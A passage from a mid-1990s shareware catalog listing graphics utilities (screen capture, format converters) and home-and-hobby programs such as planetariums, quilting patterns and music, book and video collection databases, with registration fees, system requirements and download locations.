Description: + Windows image cataloging utility. Supports BMP, CGM, GIF, ICO/ + ICN, IFF, IMG, JPEG, MAC, TIF/EPS, RLE, TGA, WMF, WPG, + Micrografx DRW, Win external filters. Output formats include: + BMP, GIF, JPEG, TIF, TGA, IFF/LBM, WMF. Display catalogs as + thumbnail images. Print images and catalogs. Image tools + include: resize, cut & paste, mirror, flip, rotate, dither, + palette manipulation. Capture screens. Supports OLE as a + server. MDI interface allows multiple images and/or catalogs to + be displayed. + + + 14.8.2 Graphic screen capture + + See also: Utilities, Hardware utilities, Screen, Screen + capture. + + Product: Capbuf + TSR captures text screens to disk. See full description on + page 80. + + Product: The DemoMaker + Creates demos/slide shows for any DOS program. See full + description on page 483. + + Product: Paint Shop [***] + Image displayer, converter, editor. scrn cap. See full + description on page 549. + + Product: Paint Shop Pro [***] + Complete painting image creation editing tool. See full + description on page 556. + + Product: PixFolio Image Catalog System + Windows image catalog utility. See full description on + page 574. + + Chapter 14, "Graphics" 576 + + + + Product: Professional Capture Systems [***] + Author: JASC, Inc., 612-930-9171 + Version: 2.0 (01-26-95) + Needs: IBM AT (80286), DOS 3.3 or better. VGA monitor; Hard + disk. + Registration fee: $39.00 (add $5.00 for shipping to U.S. + addresses) (add $5.00 for shipping to Canadian addresses) (add + $16.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; 31/2" master disk(s); + lifetime unlimited phone, fax, BBS, CompuServe, mail support; + 1-month return policy; discounts on upgrades. + Look for: PCS20.ZIP on BBSs (call 612-930-3516 to download it at + no charge); PCS.ZIP on CompuServe in CIS:JASC forum LIBrary 19 + (or contact userID 74774,570 for assistance). + Download size: 145k (about eleven minutes with a 2400 baud modem) + Description: + A combination of both Windows and DOS programs that will + simplify screen capturing. The Windows program allows for the + capturing a defined area, full screen, window, or client area. + Captures can be sent to the clipboard, printer and disk. + Numerous image formats supported. The DOS program will capture + standard and extended VGA text modes and standard VGA graphics + modes. Captures are saved to PCX or BMP files. + + + Product: WinCap+ [***] + Author: The CodeWorks+ Ltd. + Version: 1.00 (05-01-95) + Needs: IBM AT (80286), Windows 3.1 or better. VBRUN300.DLL. + Registration fee: $19.00 (add $3.00 for shipping to U.S. + addresses) + Registration benefits: 31/2" master disk(s); 3 months of + CompuServe, mail support; all ASP-wide offers (see page 6). + Look for: WCP*.ZIP on BBSs; WCP.ZIP on CompuServe in CIS:DTPFORUM + forum LIBrary 0 (or contact userID 100571,3124 for assistance). + SWREG#: 4939 + Download size: 200k (about 15 minutes with a 2400 baud modem) + Description: + A powerful bitmap viewer/printer/capture utility for Windows + (3.1). Capture a complete window, or any part of a window, then + print, save or copy it to the clipboard. Capture using a hot- + key or by pointing and clicking. Capture dropped down sub-menus + & combo/list boxes, zoom images, 16 and 256 colour supported. + An ideal tool for anyone preparing any kind of documentation + that requires an image of a window. Detailed on-line help is + provided. + + + 14.8.3 Graphic print screen + + See also: Utilities, Printer utilities. + + Chapter 14, "Graphics" 577 + + + + Product: SCP + Screen capture & print text to bitmap. See full description on + page 81. + + Product: WinCap+ [***] + Powerful Windows(3.1) screen capture utility. See full + description on page 576. + + 14.8.4 File format translators + + Product: The Complete Image + New image processor for big jobs/animations. See full + description on page 568. + + Product: The Complete Morph + Full featured morphing facility for spec. F/X. See full + description on page 563. + + Product: FF Graphics Conversion Utility + Author: M & R Technologies, Inc., 407-951-2268 + Version: 1.1 (12-20-94) + Needs: IBM 80386, Windows 3.1 or better. VGA monitor; Hard disk. + Registration fee: $0.00 + Registration benefits: 3 months of unlimited mail support; all + ASP-wide offers (see page 6). + Look for: FFGCU.ZIP on BBSs; FFGCU.ZIP on CompuServe in + CIS:WINSHARE forum LIBrary 7 (or contact userID 72103,505 for + assistance). + Download size: 41k (about three minutes with a 2400 baud modem) + Description: + Allows you to convert and metafiles and icon images into bitmap + format, suitable for use with any program that can read bitmap + images. Also allows you to scale metafiles to smaller and + larger sizes. Many of today's graphic images are sold and + distributed in Windows metafile formats, making it impossible + to use the images in programs that require bitmap images. This + solves the problem! + + + Product: Image'n'Bits + Image enhancement program for Windows. See full description on + page 548. + + Product: Jasc Media Center [***] + Multimedia file cataloging. See full description on page 574. + + Product: Paint Shop [***] + Image displayer, converter, editor. scrn cap. See full + description on page 549. + + Product: Paint Shop Pro [***] + Complete painting image creation editing tool. See full + description on page 556. + + Chapter 14, "Graphics" 578 + + + + Product: PrintGL + Pen plotter emulator package. See full description on page 88. + + Product: SCP + Screen capture & print text to bitmap. See full description on + page 81. + + + 14.9 Software tools & add-ins + + 14.9.1 For multiple programs + + Product: QUIK-INSTALL + 7k application install program! Many features. See full + description on page 486. + + Product: RTAG + Ray tracing animation generator. See full description on + page 561. + + 14.9.2 For AutoCAD + + Product: REALIZE + Full converter from .DXF to POV raytracer. See full + description on page 567. + + 14.9.3 For other + + Product: FontMe! + Author: Fischer Grafix & Software, 714-898-7262 + Version: 2.5 (10-29-93) + Needs: IBM AT (80286), Windows 3.1 or better. Hard disk; Mouse. + Registration fee: $20.00 (add $2.50 for shipping to U.S. + addresses) (add $2.50 for shipping to Canadian addresses) (add + $5.00 for shipping outside U.S. or Canada) + Registration benefits: choice of 31/2" or 51/4" master disk(s); + lifetime unlimited phone, fax, CompuServe, mail support; + discounts on other products. + Look for: FONTME.ZIP on BBSs; FONTME.ZIP on CompuServe in + CIS:IBMAPP forum LIBrary 13 (or contact userID 70233,1315 for + assistance). + Download size: 322k (about 24 minutes with a 2400 baud modem) + Description: + A comparison and printing program for those who have more + windows fonts than they know what to do with! Lets you compare + two fonts on screen, changing styles and size. Also print the + fonts for a more detailed comparison (side by side letters). + Print a complete list or book of your fonts. Compare two + similar fonts and place one on the delete list for later + removal (tells you where the font is and what name it has on + your hard disk). Too many features to list here. + + Chapter 15, "Home & hobby" 579 + + + + + + Chapter 15 + Home & hobby + + See also: Finances, Personal finances; Business, Work-at-home. + + + 15.1 Arts & crafts + + Product: PhotoPat + Author: Rainbow Scan, Inc., 404-642-7515 + Version: 1.5 (09-30-94) + Needs: IBM 80386, Windows 3.1 or better. VGA monitor. + Registration fee: $22.00 (add $3.00 for shipping to U.S. + addresses) (add $3.00 for shipping to Canadian addresses) (add + $3.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; 31/2" master disk(s); 3 + months of unlimited phone, CompuServe, mail support; 3-month + return policy; bonus utilities; bonus data; bonus graphics; all + ASP-wide offers (see page 6); discounts on other products. + 12-month free upgrading allowed. + Look for: availability unknown on BBSs; PHOTOP.ZIP on CompuServe + in CIS:CRAFTS forum LIBrary 14 (or contact userID 75027,3674 + for assistance). + Download size: 760k (about 57 minutes with a 2400 baud modem) + Description: + A truly unique Windows image processing package. Bitmap images + are read in (or transfered via the Clipboard) and then + converted into photo-realistic "color-by-number" patterns. A + sophisticated algorithm is used to optimally select pixels into + appropriate color-balanced pieces. Other features include + control of the number and density of pieces, user defineable + palettes (up to 240 colors), poster size output, HPGL and DXF + pattern output, and several image processing functions. + + Chapter 15, "Home & hobby" 580 + + + + Product: Quilt + Author: Cascoly Software, 206-523-6135 + Version: 1.32 (04-09-92) + Needs: IBM PC, DOS 2.1 or better. Program can run safely on a + system with no hard disk and only one floppy disk drive; EGA + monitor. + Registration fee: $20.00 (add $4.00 for shipping to U.S. + addresses) + Registration benefits: choice of 31/2" or 51/4" master disk(s); 3 + months of phone, CompuServe, mail support; disks of other + shareware; discounts on other products. + Look for: availability unknown on BBSs; QUILT.ZIP on CompuServe + in CIS:IBMNEW forum LIBrary 5 (or contact userID 76703,3046 for + assistance). + SWREG#: 322 + Download size: 50k (about four minutes with a 2400 baud modem) + Description: + A diverting graphics program or nonresident screen saver, using + half square quilting patterns. You can create specific + patterns or set the program to continuously change patterns. + Change widths, patterns, rotate or flip the designs, or colors + for "billions and billions" of combinations. Configurable color + palettes (v1.1 lets you set 8 colors at a time) chosen from 64 + possible colors. Ages 8 to 88. + + + 15.2 Astronomy + + Product: CircumSpace + Author: KlassM Software, Inc. + Version: 1.0 (09-06-93) + Needs: IBM PC, DOS 3.3 or better. Program can run safely on a + system with no hard disk and only one floppy disk drive; EGA + monitor. + Strongly recommended: Hard disk; Mouse. + Registration fee: $15.00 (add $5.00 for shipping outside U.S. or + Canada) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); 3 months of unlimited fax, CompuServe, mail + support; all ASP-wide offers (see page 6); discounts on other + products; discounts on upgrades. + Look for: CIRCUM10.ZIP on BBSs (call 517-695-9952 to download it + at no charge); CIRCUM.ZIP on CompuServe in CIS:ASTROFORUM forum + LIBrary 7 (or contact userID 76207,3377 for assistance); + CIRCUM10.ZIP on GEnie in IBMPC forum LIBrary 15 (or contact + userID M.HANEY3 for assistance). + Download size: 190k (about 14 minutes with a 2400 baud modem) + Description: + Displays the sky as it would actually appear from anywhere + within several hundred light years of the Earth. Fast, fun, and + easy to use, it lets the user travel to any of 7,780 nearby + stars with the click of the mouse, or choose the nifty warping + mode to smoothly animate the voyage. Learn where the Sun would + appear in the sky of your favorite star, and how bright (or + + Chapter 15, "Home & hobby" 581 + + + + dim!) it would be. See how the familiar patterns change as you + journey. + + + Product: clySmic Lunar Almanack + Author: clySmic Software, 518-438-5548 + Version: 2.00 (01-24-95) + Needs: IBM 80386, Windows 3.1 or better. + Registration fee: $9.95 + Registration benefits: 3 months of unlimited mail support; all + ASP-wide offers (see page 6). + Look for: availability unknown on BBSs; LUNA.ZIP on CompuServe in + CIS:WINSHARE forum LIBrary 0 (or contact userID 76156,164 for + assistance). + Download size: 346k (about 26 minutes with a 2400 baud modem) + Description: + Displays the current moon phase; rising, southing, and setting + times, the constellation & signe of the moon, and more. Easy to + use, with beautiful, colorful graphical display with moon icons + and scanned bitmaps. Can be run as an icon displaying the moon + phase only. Takes advantage of >16-color displays if present. + + + Product: PC-TRACK + Author: Acme Workshops, 513-878-6030 + Version: 2.14 (01-09-92) + Needs: IBM PC, DOS 2.0 or better. 640k RAM, EGA monitor. + Registration fee: $25.00 + Registration benefits: Printed manual, quick reference card, 31/2" + & 51/4" master disks, three months support. + Look for: PCT214.ZIP on BBSs (call 513-427-0674 to download it at + no charge); PCT214.ZIP on CompuServe in CIS:HAMNET forum + LIBrary 5 (or contact userID 71371,1257 for assistance). + Download size: 355k (about 27 minutes with a 2400 baud modem) + Description: + A general purpose satellite tracking package designed to take + the complexity and confusion out of finding where any earth + orbiting satellites (weather, amateur radio, military, foreign, + etc.) are in space. It will track up to 8 satellites + simultaneously and will provide necessary antenna pointing + data. It provides a colorful, graphical means of visualizing + satellite orbits both in stunning 3D spherical displays and + flat map displays. + + Chapter 15, "Home & hobby" 582 + + + + Product: SkyGlobe + Author: KlassM Software, Inc. + Version: 3.6 (10-15-93) + Needs: IBM PC, DOS 3.3 or better. 512k RAM; Program can run + safely on a system with no hard disk and only one floppy disk + drive; CGA monitor. + Strongly recommended: VGA monitor; Hard disk; Modem; Mouse. + Registration fee: $20.00 (add $5.00 for shipping outside U.S. or + Canada) + Registration benefits: printed manual; quick-reference card; + choice of 31/2" or 51/4" master disk(s); 3 months of fax, + CompuServe, mail support; bonus utilities; discounts on other + products; discounts on upgrades. + Look for: SKYGL036.ZIP on BBSs (call 517-631-3471 to download it + at no charge); SKYGLB.ZIP on CompuServe in CIS:ASTROFORUM forum + LIBrary 7 (or contact userID 76207,3377 for assistance); + SKYGLO36.ZIP on GEnie in IBMPC forum LIBrary 15 (or contact + userID M.HANEY3 for assistance). + Download size: 362k (about 27 minutes with a 2400 baud modem) + Awards & nominations: 1992 winner, Shareware Industry Awards. + 1990 winner, Public Brand Software contests for useful + programs. + Description: + The award-winning planetarium that is fast, fun, and easy. A + fixture on the Shareware Top Ten, it is the fastest program of + its kind, and it provides a realistic and beautiful display of + the spendor of the heavens. You can instantly change your + computer view of the cosmos, or use one of the many animation + modes to simulate celestial motion. Use it to plan a night's + viewing, teach yourself about the universe around us, or just + to show off the graphics of your computer. + + Chapter 15, "Home & hobby" 583 + + + + Product: SkyMap + Author: Christopher A. Marriott, 612-322-5868 + Version: 2.1 (07-01-94) + Needs: IBM 80386, Windows 3.1 or better. 2048k RAM; VGA monitor; + Hard disk; Mouse. + Strongly recommended: math coprocessor. + Registration fee: $36.00 (add $4.00 for shipping to U.S. + addresses) (add $4.00 for shipping to Canadian addresses) (add + $9.00 for shipping outside U.S. or Canada) + Registration benefits: choice of 31/2" or 51/4" master disk(s); + lifetime unlimited phone, fax, CompuServe, mail support; + lifetime limited return policy; bonus data; all ASP-wide offers + (see page 6); discounts on upgrades. + Look for: SKYMP*.ZIP on BBSs (multiple files); SKYMP*.ZIP on + CompuServe in CIS:ASTROFORUM forum LIBrary 7 (multiple files) + (or contact userID 100113,1140 for assistance). + SWREG#: 876 + Download size: 1300k (about 97 minutes with a 2400 baud modem) + Description: + A highly accurate "Planetarium" for Windows 3.1 or better. It + can display a map of the sky, as seen from anywhere on Earth, + for any date between 4000BC and 8000AD. The program can display + stars, planets, comets, and "deep sky" objects such as star + clusters, nebulae and galaxies. Extensive information about any + object on the map can be obtained simply by clicking on it, and + pictures can be displayed. High-quality maps can be printed on + any printer supported by Windows. + + + 15.3 Computers + + See also: Education, Computers. + + Product: CD-ROM Guide + Author: Save the Planet Software, 303-641-5035 + Version: 1.1 (02-04-94) + Needs: IBM PC, DOS 2.0 or better. 640k RAM; VGA monitor; Hard + disk. + Registration fee: $29.00 (add $3.00 for shipping to U.S. + addresses) (add $3.00 for shipping to Canadian addresses) (add + $10.00 for shipping outside U.S. or Canada) + Registration benefits: 3 months of unlimited mail support; bonus + utilities; bonus data; bonus graphics; all ASP-wide offers (see + page 6). + Look for: availability unknown on BBSs. + Download size: 505k (about 38 minutes with a 2400 baud modem) + Description: + A directory of CD-ROM titles for DOS and Windows. Includes + title name, system requirements, description, price, and + publisher contact information (including 800 number & FAX). A + useful way to locate exciting and unusual CD-ROMs - because + many titles can only be obtained directly from the publisher, + not from dealers or catalogs. 50 Topic categories for easy + access, plus actual CD-ROM screen shots and multimedia tips. + + Chapter 15, "Home & hobby" 584 + + + + Product: Computer System Manager + Tracks computer system hardware/software. See full description + on page 275. + + Product: DAZZLE + EGA/VGA super-kaleidoscope, image generator. See full + description on page 558. + + Product: Palette Adjuster + Adjusts the colors on your VGA monitor. See full description + on page 75. + + Product: Teleshare/DOS Remote Access [***] + Basic DOS remote control. See full description on page 443. + + + 15.4 Collecting + + Product: AlbumMaster + Author: Unicorn Software Limited, 816-429-3558 + Version: 8.50 (09-01-94) + Needs: IBM PC, DOS 3.0 or better. 330k RAM; CGA monitor; + Hercules monitor; Dual 720k floppy drives. IBM Graphics + printer. + Strongly recommended: Hard disk; HP LaserJet printer; Mouse. + Registration fee: $29.95 (add $4.00 for shipping to U.S. + addresses) (add $4.00 for shipping to Canadian addresses) (add + $4.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; quick-reference card; + choice of 31/2" or 51/4" master disk(s); lifetime unlimited phone, + fax, BBS, CompuServe, mail support; bonus utilities; all ASP- + wide offers (see page 6); disks of other shareware; discounts + on other products. Lifetime free upgrading allowed. 99 free + update disk(s) sent out. + Look for: ALBM850.ZIP on BBSs (call 317-784-2147 to download it + at no charge); ALMSTR.ZIP on CompuServe in CIS:IBMAPP forum + LIBrary 7 (or contact userID 70272,3317 for assistance). + SWREG#: 76 + Download size: 261k (about 20 minutes with a 2400 baud modem) + Description: + Designed for audiophiles who want to catalog their albums and + produce professional looking printouts, the program is easy to + use and powerful. Standard entries for title, artist, album + number, category, and tunes plus 3 user defined fields! The + user can obtain printouts for criteria or all, and can search + for all fields or combination, even tunes! Printouts include: + an abbreviated listing, full catalog, a custom lisiting, 3X5 + and Rolodex cards, front labels, and a complete tune listing! + + Chapter 15, "Home & hobby" 585 + + + + Product: AlbumMaster For Windows + Author: Unicorn Software Limited, 816-429-3558 + Version: 2.10 (09-01-94) + Needs: IBM PC, Windows 3.0 or better. + Registration fee: $33.95 (add $4.00 for shipping to U.S. + addresses) (add $4.00 for shipping to Canadian addresses) (add + $4.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); lifetime unlimited phone, fax, BBS, CompuServe, + mail support; bonus graphics; all ASP-wide offers (see page 6); + disks of other shareware; discounts on other products. + Lifetime free upgrading allowed. 99 free update disk(s) sent + out. + Look for: ALBMW210.ZIP on BBSs (call 317-784-2147 to download it + at no charge); ALBMW.ZIP on CompuServe in CIS:IBMAPP forum + LIBrary 7 (or contact userID 70272,3317 for assistance). + SWREG#: 2511 + Download size: 882k (about 66 minutes with a 2400 baud modem) + Description: + Designed for audiophiles who want to catalog their albums and + produce professional looking printouts, the program is easy to + use and powerful. Standard entries for title, artist, album + number, category, and tunes plus 3 user defined fields! The + user can obtain printouts for criteria or all, and can search + for all fields or combination, even tunes! Printouts include: + an abbreviated listing, full catalog, a custom lisiting, 3X5 + and Rolodex cards, front labels, and a complete tune listing! + + + Product: The Book Collector (New & Rare) + Author: Fischer Grafix & Software, 714-898-7262 + Version: 1.5 (10-29-93) + Needs: IBM AT (80286), DOS 3.3 or better. Hard disk. + Registration fee: $59.95 (add $2.50 for shipping to U.S. + addresses) (add $2.50 for shipping to Canadian addresses) (add + $2.50 for shipping outside U.S. or Canada) + Registration benefits: printed manual; quick-reference card; + choice of 31/2" or 51/4" master disk(s); lifetime unlimited phone, + fax, CompuServe, mail support; bonus utilities; discounts on + other products. + Look for: FGSTBC.ZIP on BBSs; FGSTBC.ZIP on CompuServe in + CIS:IBMAPP forum LIBrary 7 (or contact userID 70233,1315 for + assistance). + Download size: 250k (about 19 minutes with a 2400 baud modem) + Description: + For book collectors large or small. Keeps library location, + value, condition, date published, pages, ISBN#, subject, + author, title and lots of room for comments. Update the value + of your book as time goes on and the value increases. Also + includes a scetion to keep track of the books you would like to + add to your collection some day. Print this list when you + attend auctions, shows or conventions. You can also keep the + dealers you have had contact with and rate them. Lots of print + routines. + + Chapter 15, "Home & hobby" 586 + + + + Product: Book Librarian + Book cataloging program. See full description on page 520. + + Product: Car Restoration Diary + Data tracking for vintage auto restoration. See full + description on page 275. + + Product: CassetteMaster + Author: Unicorn Software Limited, 816-429-3558 + Version: 9.10 (09-01-94) + Needs: IBM PC, DOS 2.1 or better. 330k RAM; CGA monitor; + Hercules monitor; Dual 720k floppy drives. IBM Graphics + printer. + Strongly recommended: Hard disk; HP LaserJet printer; Mouse. + Registration fee: $29.95 (add $4.00 for shipping to U.S. + addresses) (add $4.00 for shipping to Canadian addresses) (add + $4.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; quick-reference card; 31/2" + master disk(s); 51/4" master disk(s); lifetime unlimited phone, + fax, BBS, CompuServe, mail support; bonus utilities; all ASP- + wide offers (see page 6); disks of other shareware; discounts + on other products. Lifetime free upgrading allowed. 99 free + update disk(s) sent out. + Look for: CASM910.ZIP on BBSs (call 317-784-2147 to download it + at no charge); CMSTR.ZIP on CompuServe in CIS:IBMAPP forum + LIBrary 7 (or contact userID 70272,3317 for assistance). + SWREG#: 77 + Download size: 261k (about 20 minutes with a 2400 baud modem) + Description: + Designed for users who want to catalog their cassettes and + produce professional looking printouts, the program is easy to + use and powerful. Standard entries for title, artist, tape + number, category, and tunes plus 3 user defined fields! The + user can obtain printouts for criteria or all, and can search + for all fields or combination, even tunes! Printouts include: + an abbreviated listing, full catalog, a custom lisiting, 3X5 + and Rolodex cards, front labels, or J Card style case inserts & + a tune list! + + + Product: CassetteMaster For Windows + Author: Unicorn Software Limited, 816-429-3558 + Version: 2.10 (09-01-94) + Needs: IBM PC, Windows 3.0 or better. 330k RAM; CGA monitor; + Hercules monitor; Dual 720k floppy drives. IBM Graphics + printer. + Strongly recommended: Hard disk; HP LaserJet printer; Mouse. + Registration fee: $29.95 (add $4.00 for shipping to U.S. + addresses) (add $4.00 for shipping to Canadian addresses) (add + $4.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; quick-reference card; 31/2" + master disk(s); 51/4" master disk(s); lifetime unlimited phone, + fax, BBS, CompuServe, mail support; bonus utilities; all ASP- + wide offers (see page 6); disks of other shareware; discounts + + Chapter 15, "Home & hobby" 587 + + + + on other products. Lifetime free upgrading allowed. 99 free + update disk(s) sent out. + Look for: CASW210.ZIP on BBSs (call 317-784-2147 to download it + at no charge); CMSTRW.ZIP on CompuServe in CIS:IBMAPP forum + LIBrary 7 (or contact userID 70272,3317 for assistance). + SWREG#: 3697 + Download size: 872k (about 65 minutes with a 2400 baud modem) + Description: + Designed for users who want to catalog their cassettes and + produce professional looking printouts, the program is easy to + use and powerful. Standard entries for title, artist, tape + number, category, and tunes plus 3 user defined fields! The + user can obtain printouts for criteria or all, and can search + for all fields or combination, even tunes! Printouts include: + an abbreviated listing, full catalog, a custom lisiting, 3X5 + and Rolodex cards, front labels, or J Card style case inserts & + a tune list! + + + Product: CDMaster + Author: Unicorn Software Limited, 816-429-3558 + Version: 8.60 (09-01-94) + Needs: IBM PC, DOS 3.0 or better. 330k RAM; CGA monitor; + Hercules monitor; Dual 720k floppy drives. IBM Graphics or + Laser printer. + Strongly recommended: Hard disk; HP LaserJet printer; Mouse. + Registration fee: $29.95 (add $4.00 for shipping to U.S. + addresses) (add $4.00 for shipping to Canadian addresses) (add + $4.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; quick-reference card; 31/2" + master disk(s); 51/4" master disk(s); lifetime unlimited phone, + fax, BBS, CompuServe, mail support; bonus utilities; all ASP- + wide offers (see page 6); disks of other shareware; discounts + on other products. Lifetime free upgrading allowed. 99 free + update disk(s) sent out. + Look for: CDM860.ZIP on BBSs (call 317-784-2147 to download it at + no charge); CDMSTR.ZIP on CompuServe in CIS:IBMAPP forum + LIBrary 7 (or contact userID 70272,3317 for assistance). + SWREG#: 78 + Download size: 341k (about 26 minutes with a 2400 baud modem) + Description: + CD lovers need a program as sophisticated as the format itself + to catalog their collections. This is the answer! The program + is easy to use and powerful. Standard entries for title, + artist, CD number, category, and tunes (plus 3 user defined + fields! The user can obtain printouts for criteria or all, and + can search for all fields or combination, even tunes! Printouts + include: an abbreviated listing, full catalog, a custom + lisiting, 3X5 and Rolodex cards, front labels, and a complete + tune list! + + + Product: CDMaster For Windows + The BeZT CD library ever! See full description on page 630. + + Chapter 15, "Home & hobby" 588 + + + + Product: CDPlayer for Windows and DOS + Audio CD playing and cataloging program. See full description + on page 631. + + Product: Household Register + Author: TurboSystemsCo, 404-516-8575 + Version: 3.12 (12-27-93) + Needs: IBM PC, DOS 2.1 or better. 384k RAM; CGA monitor. + Strongly recommended: Hard disk. + Registration fee: $34.95 (add $4.00 for shipping to U.S. + addresses) (add $4.00 for shipping to Canadian addresses) (add + $8.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); 12 months of phone, fax, CompuServe, GEnie + support. + Look for: HR312.ZIP on BBSs (call 703-680-9269 to download it at + no charge); HR.ZIP on CompuServe in CIS:IBMAPP forum LIBrary 7 + (or contact userID 72427,1603 for assistance); HR312.ZIP on + GEnie in IBMPC forum LIBrary 15 (or contact userID L.TURNER1 + for assistance). + Download size: 183k (about 14 minutes with a 2400 baud modem) + Description: + Excellent easy-to-use menu-driven home/office inventory program + holds upto 99,999 items and can use an unlimited number of + databases. Includes complete database management functions and + full featured report printing. Lists reports to screen, + printer or disk. A valuation report prints your inventory and a + summary of total items by category, location or owner. Features + pop-up pick lists; on-line help; warranty lists showing + warranty expiration dates, a sample database and much more. + + + Product: MCBase + Author: Harry Doldersum, NL-(0)74668480 + Version: 1.1e (06-01-94) + Needs: IBM PC, DOS 3.0 or better. 512k RAM; Hard disk. + Strongly recommended: Epson printer; EMS memory; XMS memory; + math coprocessor. + Registration fee: $22.00 (add $8.00 for shipping to U.S. + addresses) (add $8.00 for shipping to Canadian addresses) (add + $8.00 for shipping outside U.S. or Canada) + Registration benefits: choice of 31/2" or 51/4" master disk(s); + lifetime unlimited fax, BBS, CompuServe, newsletter, mail + support; discounts on upgrades. 6-month free upgrading allowed. + Look for: MCB11E.ARJ on BBSs; MCB11E.EXE on CompuServe in + CIS:COLLECT forum LIBrary 14 (or contact userID 100270,2132 for + assistance). + SWREG#: 1636 + PsL#: 11341 + Download size: 130k (about ten minutes with a 2400 baud modem) + Description: + A fully relational database system for music collections, + giving you full access to your collection, onscreen or on + hardcopy. You can access the items in your collection by + + Chapter 15, "Home & hobby" 589 + + + + artistname, album-/cd-title, songtitle or also on a + locationcode if stored on tape. Written in Pascal and uses the + dBase .DBF file standard, to ensure your data is stored in a + transparant, reliable and standarized manner. + + + Product: RMS-III: Ref.Mgn.Sys. + Menu based biblio/reference system. See full description on + page 246. + + Product: ScrollZ + Author: Unicorn Software Limited, 816-429-3558 + Version: 2.10 (09-01-94) + Needs: IBM PC, DOS 2.1 or better. 330k RAM; CGA monitor; + Hercules monitor; Dual 720k floppy drives. IBM Graphics + printer. + Strongly recommended: Hard disk; HP LaserJet printer; Mouse. + Registration fee: $25.00 (add $4.00 for shipping to U.S. + addresses) (add $4.00 for shipping to Canadian addresses) (add + $4.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; quick-reference card; 31/2" + master disk(s); 51/4" master disk(s); 3 months of unlimited + phone, fax, BBS, CompuServe, mail support; all ASP-wide offers + (see page 6); disks of other shareware; discounts on other + products. Lifetime free upgrading allowed. 99 free update + disk(s) sent out. + Look for: SCRLZ210.ZIP on BBSs (call 317-784-2147 to download it + at no charge); SCROLZ.ZIP on CompuServe in CIS:IBMAPP forum + LIBrary 7 (or contact userID 70272,3317 for assistance). + Download size: 262k (about 20 minutes with a 2400 baud modem) + Description: + A great way to track all of your printed matter; be it + magazines, comics, books, graphic novels, newspapers, + newsletters, anything! All in one easy to use system. Input + screens designed with specific needs in mind, even a NoteZ + section for recording your own thoughts and comments! Prints + listings, catalogs, 3X5 or Rolodex cards, custom listings, and + even a statistical breakdown of your collection! Cross + reference by any of the fields or combination. Find by any + field or combination, even NoteZ! + + + Product: SoundZ + Author: Unicorn Software Limited, 816-429-3558 + Version: 4.00 (09-01-94) + Needs: IBM PC, DOS 2.1 or better. 330k RAM; CGA monitor; + Hercules monitor; Hard disk. IBM Graphics printer. + Strongly recommended: HP LaserJet printer; Mouse. + Registration fee: $45.00 (add $4.00 for shipping to U.S. + addresses) (add $4.00 for shipping to Canadian addresses) (add + $4.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; quick-reference card; 31/2" + master disk(s); 51/4" master disk(s); lifetime unlimited phone, + fax, BBS, CompuServe, mail support; bonus utilities; all ASP- + + Chapter 15, "Home & hobby" 590 + + + + wide offers (see page 6); disks of other shareware; discounts + on other products. Lifetime free upgrading allowed. 99 free + update disk(s) sent out. + Look for: SOUNDZ4.ZIP on BBSs (call 317-784-2147 to download it + at no charge); SOUNDZ.ZIP on CompuServe in CIS:IBMAPP forum + LIBrary 7 (or contact userID 70272,3317 for assistance). + SWREG#: 63 + Download size: 450k (about 34 minutes with a 2400 baud modem) + Description: + Designed for audiophiles who have multiple formats for their + collections (cassettes, CDs, 45s, 78s, LPs, and reel to reels). + It is more in depth than any of the other audio program. So, if + you need more than a basic catalog then this is for you! + Standard entries for title, artist, reference number, category, + price/value, date of purchase, date of origin, unlimited number + of songs per side (with notes entries for each!), and a text + liner NoteZ field of up to 5000 lines. + + + Product: SoundZ For Windows + Author: Unicorn Software Limited, 816-429-3558 + Version: 2.15 (03-09-95) + Needs: IBM PC, Windows 3.0 or better. 330k RAM; CGA monitor; + Hercules monitor; Hard disk. IBM Graphics printer. + Strongly recommended: HP LaserJet printer; Mouse. + Registration fee: $45.00 (add $4.00 for shipping to U.S. + addresses) (add $4.00 for shipping to Canadian addresses) (add + $4.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; quick-reference card; 31/2" + master disk(s); 51/4" master disk(s); lifetime unlimited phone, + fax, BBS, CompuServe, mail support; bonus utilities; all ASP- + wide offers (see page 6); disks of other shareware; discounts + on other products. Lifetime free upgrading allowed. 99 free + update disk(s) sent out. + Look for: SDZW215.ZIP on BBSs (call 317-784-2147 to download it + at no charge); SNDZW.ZIP on CompuServe in CIS:IBMAPP forum + LIBrary 7 (or contact userID 70272,3317 for assistance). + SWREG#: 3696 + Download size: 950k (about 71 minutes with a 2400 baud modem) + Description: + Designed for audiophiles who have multiple formats for their + collections (cassettes, CDs, 45s, 78s, LPs, and reel to reels). + It is more in depth than any of the other audio program. So, if + you need more than a basic catalog then this is for you! + Standard entries for title, artist, reference number, category, + price/value, date of purchase, date of origin, unlimited number + of songs per side (with notes entries for each!), and a text + liner NoteZ field of up to 5000 lines. Plus save scanned cover + art! + + Chapter 15, "Home & hobby" 591 + + + + Product: VideoMaster + Author: Unicorn Software Limited, 816-429-3558 + Version: 9.00 (11-29-94) + Needs: IBM PC, DOS 2.1 or better. 330k RAM; CGA monitor; + Hercules monitor; Dual 720k floppy drives. IBM Graphics + printer. + Strongly recommended: Hard disk; HP LaserJet printer; Mouse. + Registration fee: $29.95 (add $4.00 for shipping to U.S. + addresses) (add $4.00 for shipping to Canadian addresses) (add + $4.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; quick-reference card; 31/2" + master disk(s); 51/4" master disk(s); lifetime unlimited phone, + fax, BBS, CompuServe, mail support; all ASP-wide offers (see + page 6); disks of other shareware; discounts on other products. + Lifetime free upgrading allowed. 99 free update disk(s) sent + out. + Look for: VIDM900.ZIP on BBSs (call 317-784-2147 to download it + at no charge); VIDM.ZIP on CompuServe in CIS:IBMAPP forum + LIBrary 7 (or contact userID 70272,3317 for assistance). + SWREG#: 61 + Download size: 244k (about 18 minutes with a 2400 baud modem) + Description: + To help user catalog their video tapes and assist user in + printing catalogs, standard and user customized listings and + labels for 